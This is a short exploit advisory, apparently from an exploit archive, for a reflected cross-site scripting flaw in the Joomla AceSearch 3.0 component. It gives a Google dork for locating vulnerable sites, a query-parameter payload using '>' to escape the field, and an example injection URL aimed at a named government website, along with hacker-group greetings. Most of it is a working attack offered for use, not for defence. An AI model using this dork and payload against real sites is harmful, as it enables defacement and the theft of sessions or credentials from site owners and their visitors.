Joomla AceSearch component version 3.0 suffers from a cross site scripting vulnerability.
e7a05ee0db5238182077cb146d0bce90318ec17be3495461f1abfbfc7421e6d8
#Title : Joomla Component AceSearch Cross Site Scripting
#Author : DevilScreaM
#Date : 5 January 2014
#Category : Web Applications
#Product : http://www.joomace.net/joomla-extensions/acesearch/
#Version : 3.0
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Cross Site Scripting
#Dork : inurl:component/acesearch/
Cross Site Scripting
http://site-target/component/acesearch/search?query=>[XSS]
Use > for Bypass Cross Site Scripting
Example :
http://kpi.go.id/index.php/component/acesearch/search?query=><h1>DevilScreaM</h1>